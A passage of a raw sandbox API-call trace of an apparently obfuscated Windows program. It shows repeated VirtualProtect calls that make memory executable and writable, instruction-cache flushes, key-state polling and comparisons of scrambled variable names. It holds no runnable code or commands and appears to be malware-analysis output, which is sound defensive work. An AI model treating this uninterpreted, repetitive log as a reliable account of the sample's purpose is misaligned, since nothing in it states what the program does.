GetCurrentProcess () returned 0xffffffff [0110.394] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a9, dwSize=0x2) returned 1 [0110.394] GetCurrentProcess () returned 0xffffffff [0110.394] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c8, dwSize=0x14) returned 1 [0110.394] VirtualProtect (in: lpAddress=0xf5d01c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.394] GetCurrentProcess () returned 0xffffffff [0110.394] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c9, dwSize=0x2) returned 1 [0110.394] GetCurrentProcess () returned 0xffffffff [0110.394] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e8, dwSize=0x14) returned 1 [0110.394] VirtualProtect (in: lpAddress=0xf5d01e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.395] GetCurrentProcess () returned 0xffffffff [0110.395] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e9, dwSize=0x2) returned 1 [0110.395] GetCurrentProcess () returned 0xffffffff [0110.395] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0208, dwSize=0x14) returned 1 [0110.395] VirtualProtect (in: lpAddress=0xf5d0208, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.395] GetCurrentProcess () returned 0xffffffff [0110.395] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0209, dwSize=0x2) returned 1 [0110.395] GetCurrentProcess () returned 0xffffffff [0110.395] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0228, dwSize=0x14) returned 1 [0110.396] VirtualProtect (in: lpAddress=0xf5d0228, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.396] GetCurrentProcess () returned 0xffffffff [0110.396] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0229, dwSize=0x2) returned 1 [0110.396] GetCurrentProcess () returned 0xffffffff [0110.396] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4868, dwSize=0x14) returned 1 [0110.396] VirtualProtect (in: lpAddress=0xc8b4868, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.397] GetCurrentProcess () returned 0xffffffff [0110.397] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4869, dwSize=0x2) returned 1 [0110.397] GetCurrentProcess () returned 0xffffffff [0110.397] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4888, dwSize=0x14) returned 1 [0110.397] VirtualProtect (in: lpAddress=0xc8b4888, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.397] GetCurrentProcess () returned 0xffffffff [0110.397] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4889, dwSize=0x2) returned 1 [0110.397] GetCurrentProcess () returned 0xffffffff [0110.397] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a8, dwSize=0x14) returned 1 [0110.397] VirtualProtect (in: lpAddress=0xc8b48a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0110.398] GetCurrentProcess () returned 0xffffffff [0110.398] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a9, dwSize=0x2) returned 1 [0110.399] GetAsyncKeyState (vKey=3) returned 0 [0110.399] VarCmp (pvarLeft=0x197d98, pvarRight=0x197d88, lcid=0x0, dwFlags=0x30001) returned 0x1 [0110.399] CRetailMalloc_Alloc () returned 0xcb3e148 [0110.399] memcpy (in: _Dst=0xd015168, _Src=0x197508, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.399] memcpy (in: _Dst=0xd015270, _Src=0x197524, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0110.401] memcpy (in: _Dst=0xd015168, _Src=0x197508, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.401] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x96\x97\x97\x97\x97\x97\x96\x96\x97\x97\x96\x96\x97\x96\x96\x96\x96", cchCount1=-1, lpString2="\x97\x96\x97\x96\x96\x96\x96\x96\x96\x96\x97\x96\x97\x97\x96\x97\x96\x97\x97", cchCount2=-1) returned 3 [0110.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302d86, cbMultiByte=20, lpWideCharStr=0x197324, cchWideChar=21 | out: lpWideCharStr="—–—–––––––—–——–—–——") returned 20 [0110.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e2bfa, cbMultiByte=20, lpWideCharStr=0x197384, cchWideChar=21 | out: lpWideCharStr="—–—–––––––—–——–—–——") returned 20 [0110.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e2bfa, cbMultiByte=20, lpWideCharStr=0x197384, cchWideChar=21 | out: lpWideCharStr="—–—–––––––—–——–—–——") returned 20 [0110.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e2bfa, cbMultiByte=20, lpWideCharStr=0x197384, cchWideChar=21 | out: lpWideCharStr="—–—–––––––—–——–—–——") returned 20 [0110.402] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x96\x97\x97\x97\x97\x97\x96\x96\x97\x97\x96\x96\x97\x96\x96\x96\x96", cchCount1=-1, lpString2="\x97\x96\x97\x96\x96\x96\x96\x96\x96\x96\x97\x96\x97\x97\x96\x97\x96\x97\x97", cchCount2=-1) returned 3 [0110.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e2bfa, cbMultiByte=20, lpWideCharStr=0x197384, cchWideChar=21 | out: lpWideCharStr="—–—–––––––—–——–—–——") returned 20 [0110.402] CRetailMalloc_Alloc () returned 0xc856cc0 [0110.402] _mbscpy_s (in: _Dst=0xc856cc0, _DstSizeInBytes=0x14, _Src=0x111e2bfa | out: _Dst=0xc856cc0) returned 0x0 [0110.402] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="_B_var_\x97\x97\x96\x97\x97\x97\x97\x97\x96\x96\x97\x97\x96\x96\x97\x96\x96\x96\x96", cchCount1=-1, lpString2="_B_var_\x97\x96\x97\x96\x96\x96\x96\x96\x96\x96\x97\x96\x97\x97\x96\x97\x96\x97\x97", cchCount2=-1) returned 3 [0110.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0ac6, cbMultiByte=27, lpWideCharStr=0x197394, cchWideChar=28 | out: lpWideCharStr="_B_var_—–—–––––––—–——–—–——") returned 27 [0110.403] _mbscpy_s (in: _Dst=0x1973fc, _DstSizeInBytes=0x14, _Src=0x111e2bfa | out: _Dst=0x1973fc) returned 0x0 [0110.403] CRetailMalloc_Free () returned 0x1 [0110.403] memcpy (in: _Dst=0xd015270, _Src=0xd015270, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0110.403] memcpy (in: _Dst=0xd015168, _Src=0x197508, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.403] memcpy (in: _Dst=0xd015168, _Src=0x197374, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.403] memcpy (in: _Dst=0xd015168, _Src=0x197374, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.403] CRetailMalloc_Realloc () returned 0xcb65fa0 [0110.404] memcpy (in: _Dst=0xd015168, _Src=0x197374, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.405] memcpy (in: _Dst=0xd015168, _Src=0x197508, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.405] memcpy (in: _Dst=0xd015168, _Src=0x197508, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.405] memcpy (in: _Dst=0xcb3e1c8, _Src=0x1975a4, _Size=0x18 | out: _Dst=0xcb3e1c8) returned 0xcb3e1c8 [0110.406] CRetailMalloc_Realloc () returned 0xcb3e148 [0110.406] CRetailMalloc_Free () returned 0x1 [0110.406] GetCurrentProcess () returned 0xffffffff [0110.406] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601714, dwSize=0x14) returned 1 [0110.406] VirtualProtect (in: lpAddress=0xf601714, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.406] GetCurrentProcess () returned 0xffffffff [0110.406] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601715, dwSize=0x2) returned 1 [0110.407] GetCurrentProcess () returned 0xffffffff [0110.407] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601734, dwSize=0x14) returned 1 [0110.407] VirtualProtect (in: lpAddress=0xf601734, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.407] GetCurrentProcess () returned 0xffffffff [0110.407] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601735, dwSize=0x2) returned 1 [0110.407] GetCurrentProcess () returned 0xffffffff [0110.407] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601754, dwSize=0x14) returned 1 [0110.407] VirtualProtect (in: lpAddress=0xf601754, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.408] GetCurrentProcess () returned 0xffffffff [0110.408] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601755, dwSize=0x2) returned 1 [0110.408] GetCurrentProcess () returned 0xffffffff [0110.408] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601774, dwSize=0x14) returned 1 [0110.408] VirtualProtect (in: lpAddress=0xf601774, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.408] GetCurrentProcess () returned 0xffffffff [0110.408] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601775, dwSize=0x2) returned 1 [0110.408] GetCurrentProcess () returned 0xffffffff [0110.409] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601794, dwSize=0x14) returned 1 [0110.409] VirtualProtect (in: lpAddress=0xf601794, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.409] GetCurrentProcess () returned 0xffffffff [0110.409] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601795, dwSize=0x2) returned 1 [0110.409] GetCurrentProcess () returned 0xffffffff [0110.409] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b4, dwSize=0x14) returned 1 [0110.409] VirtualProtect (in: lpAddress=0xf6017b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.410] GetCurrentProcess () returned 0xffffffff [0110.410] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b5, dwSize=0x2) returned 1 [0110.410] GetCurrentProcess () returned 0xffffffff [0110.410] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d4, dwSize=0x14) returned 1 [0110.410] VirtualProtect (in: lpAddress=0xf6017d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.410] GetCurrentProcess () returned 0xffffffff [0110.410] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d5, dwSize=0x2) returned 1 [0110.410] GetCurrentProcess () returned 0xffffffff [0110.410] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f4, dwSize=0x14) returned 1 [0110.411] VirtualProtect (in: lpAddress=0xf6017f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.411] GetCurrentProcess () returned 0xffffffff [0110.411] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f5, dwSize=0x2) returned 1 [0110.411] GetCurrentProcess () returned 0xffffffff [0110.411] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601814, dwSize=0x14) returned 1 [0110.411] VirtualProtect (in: lpAddress=0xf601814, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.412] GetCurrentProcess () returned 0xffffffff [0110.412] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601815, dwSize=0x2) returned 1 [0110.412] GetCurrentProcess () returned 0xffffffff [0110.412] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601834, dwSize=0x14) returned 1 [0110.412] VirtualProtect (in: lpAddress=0xf601834, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.412] GetCurrentProcess () returned 0xffffffff [0110.412] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601835, dwSize=0x2) returned 1 [0110.412] GetCurrentProcess () returned 0xffffffff [0110.412] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601854, dwSize=0x14) returned 1 [0110.412] VirtualProtect (in: lpAddress=0xf601854, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.413] GetCurrentProcess () returned 0xffffffff [0110.413] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601855, dwSize=0x2) returned 1 [0110.413] GetCurrentProcess () returned 0xffffffff [0110.413] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601874, dwSize=0x14) returned 1 [0110.413] VirtualProtect (in: lpAddress=0xf601874, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.414] GetCurrentProcess () returned 0xffffffff [0110.414] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601875, dwSize=0x2) returned 1 [0110.414] GetCurrentProcess () returned 0xffffffff [0110.414] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0048, dwSize=0x14) returned 1 [0110.414] VirtualProtect (in: lpAddress=0xf5d0048, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.414] GetCurrentProcess () returned 0xffffffff [0110.414] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0049, dwSize=0x2) returned 1 [0110.414] GetCurrentProcess () returned 0xffffffff [0110.414] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0068, dwSize=0x14) returned 1 [0110.414] VirtualProtect (in: lpAddress=0xf5d0068, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.415] GetCurrentProcess () returned 0xffffffff [0110.415] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0069, dwSize=0x2) returned 1 [0110.415] GetCurrentProcess () returned 0xffffffff [0110.415] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0088, dwSize=0x14) returned 1 [0110.415] VirtualProtect (in: lpAddress=0xf5d0088, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.415] GetCurrentProcess () returned 0xffffffff [0110.415] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0089, dwSize=0x2) returned 1 [0110.415] GetCurrentProcess () returned 0xffffffff [0110.416] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a8, dwSize=0x14) returned 1 [0110.416] VirtualProtect (in: lpAddress=0xf5d00a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.416] GetCurrentProcess () returned 0xffffffff [0110.416] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a9, dwSize=0x2) returned 1 [0110.416] GetCurrentProcess () returned 0xffffffff [0110.416] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c8, dwSize=0x14) returned 1 [0110.416] VirtualProtect (in: lpAddress=0xf5d00c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.417] GetCurrentProcess () returned 0xffffffff [0110.417] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c9, dwSize=0x2) returned 1 [0110.417] GetCurrentProcess () returned 0xffffffff [0110.417] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e8, dwSize=0x14) returned 1 [0110.417] VirtualProtect (in: lpAddress=0xf5d00e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.417] GetCurrentProcess () returned 0xffffffff [0110.417] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e9, dwSize=0x2) returned 1 [0110.417] GetCurrentProcess () returned 0xffffffff [0110.417] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0108, dwSize=0x14) returned 1 [0110.417] VirtualProtect (in: lpAddress=0xf5d0108, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.418] GetCurrentProcess () returned 0xffffffff [0110.418] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0109, dwSize=0x2) returned 1 [0110.418] GetCurrentProcess () returned 0xffffffff [0110.418] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0128, dwSize=0x14) returned 1 [0110.418] VirtualProtect (in: lpAddress=0xf5d0128, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.422] GetCurrentProcess () returned 0xffffffff [0110.422] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0129, dwSize=0x2) returned 1 [0110.422] GetCurrentProcess () returned 0xffffffff [0110.422] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0148, dwSize=0x14) returned 1 [0110.422] VirtualProtect (in: lpAddress=0xf5d0148, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.422] GetCurrentProcess () returned 0xffffffff [0110.422] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0149, dwSize=0x2) returned 1 [0110.422] GetCurrentProcess () returned 0xffffffff [0110.422] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0168, dwSize=0x14) returned 1 [0110.422] VirtualProtect (in: lpAddress=0xf5d0168, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.423] GetCurrentProcess () returned 0xffffffff [0110.423] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0169, dwSize=0x2) returned 1 [0110.423] GetCurrentProcess () returned 0xffffffff [0110.423] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0188, dwSize=0x14) returned 1 [0110.423] VirtualProtect (in: lpAddress=0xf5d0188, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.424] GetCurrentProcess () returned 0xffffffff [0110.424] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0189, dwSize=0x2) returned 1 [0110.424] GetCurrentProcess () returned 0xffffffff [0110.424] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a8, dwSize=0x14) returned 1 [0110.424] VirtualProtect (in: lpAddress=0xf5d01a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.424] GetCurrentProcess () returned 0xffffffff [0110.424] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a9, dwSize=0x2) returned 1 [0110.424] GetCurrentProcess () returned 0xffffffff [0110.424] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c8, dwSize=0x14) returned 1 [0110.424] VirtualProtect (in: lpAddress=0xf5d01c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.425] GetCurrentProcess () returned 0xffffffff [0110.425] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c9, dwSize=0x2) returned 1 [0110.425] GetCurrentProcess () returned 0xffffffff [0110.425] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e8, dwSize=0x14) returned 1 [0110.425] VirtualProtect (in: lpAddress=0xf5d01e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.425] GetCurrentProcess () returned 0xffffffff [0110.425] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e9, dwSize=0x2) returned 1 [0110.425] GetCurrentProcess () returned 0xffffffff [0110.425] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0208, dwSize=0x14) returned 1 [0110.425] VirtualProtect (in: lpAddress=0xf5d0208, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.426] GetCurrentProcess () returned 0xffffffff [0110.426] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0209, dwSize=0x2) returned 1 [0110.426] GetCurrentProcess () returned 0xffffffff [0110.426] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0228, dwSize=0x14) returned 1 [0110.426] VirtualProtect (in: lpAddress=0xf5d0228, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.427] GetCurrentProcess () returned 0xffffffff [0110.427] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0229, dwSize=0x2) returned 1 [0110.427] GetCurrentProcess () returned 0xffffffff [0110.427] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4868, dwSize=0x14) returned 1 [0110.427] VirtualProtect (in: lpAddress=0xc8b4868, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.429] GetCurrentProcess () returned 0xffffffff [0110.429] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4869, dwSize=0x2) returned 1 [0110.429] GetCurrentProcess () returned 0xffffffff [0110.429] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4888, dwSize=0x14) returned 1 [0110.429] VirtualProtect (in: lpAddress=0xc8b4888, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.430] GetCurrentProcess () returned 0xffffffff [0110.430] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4889, dwSize=0x2) returned 1 [0110.430] GetCurrentProcess () returned 0xffffffff [0110.430] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a8, dwSize=0x14) returned 1 [0110.430] VirtualProtect (in: lpAddress=0xc8b48a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0110.431] GetCurrentProcess () returned 0xffffffff [0110.431] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a9, dwSize=0x2) returned 1 [0110.432] GetAsyncKeyState (vKey=3) returned 0 [0110.432] GetAsyncKeyState (vKey=3) returned 0 [0110.432] CRetailMalloc_Alloc () returned 0xcb69fa8 [0110.432] memcpy (in: _Dst=0xd015168, _Src=0x1973fc, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0110.432] memcpy (in: _Dst=0xcb69fc8, _Src=0x197464, _Size=0x18 | out: _Dst=0xcb69fc8) returned 0xcb69fc8 [0110.432] CRetailMalloc_Realloc () returned 0xcb69fa8 [0110.432] CRetailMalloc_Free () returned 0x1 [0110.432] GetCurrentProcess () returned 0xffffffff [0110.432] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601714, dwSize=0x14) returned 1 [0110.432] VirtualProtect (in: lpAddress=0xf601714, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.433] GetCurrentProcess () returned 0xffffffff [0110.433] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601715, dwSize=0x2) returned 1 [0110.433] GetCurrentProcess () returned 0xffffffff [0110.433] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601734, dwSize=0x14) returned 1 [0110.433] VirtualProtect (in: lpAddress=0xf601734, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.434] GetCurrentProcess () returned 0xffffffff [0110.434] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601735, dwSize=0x2) returned 1 [0110.434] GetCurrentProcess () returned 0xffffffff [0110.434] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601754, dwSize=0x14) returned 1 [0110.434] VirtualProtect (in: lpAddress=0xf601754, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.435] GetCurrentProcess () returned 0xffffffff [0110.435] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601755, dwSize=0x2) returned 1 [0110.435] GetCurrentProcess () returned 0xffffffff [0110.435] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601774, dwSize=0x14) returned 1 [0110.435] VirtualProtect (in: lpAddress=0xf601774, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.435] GetCurrentProcess () returned 0xffffffff [0110.435] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601775, dwSize=0x2) returned 1 [0110.435] GetCurrentProcess () returned 0xffffffff [0110.435] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601794, dwSize=0x14) returned 1 [0110.435] VirtualProtect (in: lpAddress=0xf601794, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.436] GetCurrentProcess () returned 0xffffffff [0110.436] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601795, dwSize=0x2) returned 1 [0110.436] GetCurrentProcess () returned 0xffffffff [0110.436] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b4, dwSize=0x14) returned 1 [0110.436] VirtualProtect (in: lpAddress=0xf6017b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.437] GetCurrentProcess () returned 0xffffffff [0110.437] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b5, dwSize=0x2) returned 1 [0110.437] GetCurrentProcess () returned 0xffffffff [0110.437] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d4, dwSize=0x14) returned 1 [0110.437] VirtualProtect (in: lpAddress=0xf6017d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.437] GetCurrentProcess () returned 0xffffffff [0110.437] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d5, dwSize=0x2) returned 1 [0110.437] GetCurrentProcess () returned 0xffffffff [0110.437] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f4, dwSize=0x14) returned 1 [0110.437] VirtualProtect (in: lpAddress=0xf6017f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.438] GetCurrentProcess () returned 0xffffffff [0110.438] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f5, dwSize=0x2) returned 1 [0110.438] GetCurrentProcess () returned 0xffffffff [0110.438] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601814, dwSize=0x14) returned 1 [0110.438] VirtualProtect (in: lpAddress=0xf601814, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0110.438] GetCurrentProcess () returned 0xffffffff [0110.439] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601815, dwSize=0x2) returned 1 [0110.439] GetCurrentProcess () returned 0xffffffff [0110.439] 